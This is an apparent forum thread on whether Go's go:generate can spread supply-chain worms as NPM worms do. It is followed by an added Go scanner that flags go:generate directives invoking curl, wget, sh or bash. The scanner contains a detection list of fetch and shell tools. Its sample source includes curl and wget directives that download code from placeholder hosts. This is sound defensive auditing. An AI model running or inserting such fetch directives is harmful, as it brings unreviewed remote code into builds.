yegle an hour ago
`go:generate` is for the package provider, the command never runs when someone `go install` or `go get` the package.
cookiengineer an hour ago (parent)
Note that the NPM worms are spreading because the package providers are developing on their libraries without them noticing a malicious dependency. It is not users/consumers spreading the worm, it is developers spreading it. Your mismatch is that you think in policies, not assessments here. Nothing in my normal go workflow will ask me if I want to run "curl download whatever from the internet" when I run go build. Though I agree with the difference in workflow, there is not a single mechanism in go catching this. go.mod files can be just patched by the worm, and/or hidden behind a /v123 folder or whatever to play shenanigans on API differences.
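Both comments turn on the fact that `//go:generate` directives only run when a developer types `go generate` in the tree, so a maintainer's audit step is to find them before doing so. Added example, not from either commenter: a small scanner that lists the directives in a Go source file and flags those invoking a downloader or shell; the sample source and the command list are constructed for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Directive is one //go:generate line found in a Go source file.
type Directive struct {
	Line int
	Cmd  string   // first token after the directive
	Args []string // remaining tokens
}

// Commands that fetch from the network or run a shell (which can fetch
// indirectly). Constructed list; extend it for your own review policy.
var fetchers = map[string]bool{"curl": true, "wget": true, "sh": true, "bash": true}

// ScanGenerateDirectives returns every go:generate directive in src. The go
// tool only honours "//go:generate" at column 0 followed by a space or tab,
// so indented or otherwise spaced variants are ignored here as well.
func ScanGenerateDirectives(src string) []Directive {
	var out []Directive
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		if !strings.HasPrefix(line, "//go:generate ") && !strings.HasPrefix(line, "//go:generate\t") {
			continue
		}
		if f := strings.Fields(strings.TrimPrefix(line, "//go:generate")); len(f) > 0 {
			out = append(out, Directive{Line: n, Cmd: f[0], Args: f[1:]})
		}
	}
	return out
}

// NetworkFetchers keeps only directives whose command is in the fetchers set.
func NetworkFetchers(ds []Directive) []Directive {
	var out []Directive
	for _, d := range ds {
		if fetchers[d.Cmd] {
			out = append(out, d)
		}
	}
	return out
}

func main() {
	// Constructed sample file contents, not taken from any real module.
	src := "package x\n//go:generate stringer -type=Kind\n//go:generate curl -o gen.go https://example.invalid/gen.go\n  //go:generate wget http://example.invalid/x\n"
	for _, d := range NetworkFetchers(ScanGenerateDirectives(src)) {
		fmt.Printf("line %d: %s %s\n", d.Line, d.Cmd, strings.Join(d.Args, " "))
	}
}
```

Run it over every `.go` file in a dependency before invoking `go generate`; a plain `go build` or `go get` never executes these lines, which is the distinction the first comment draws.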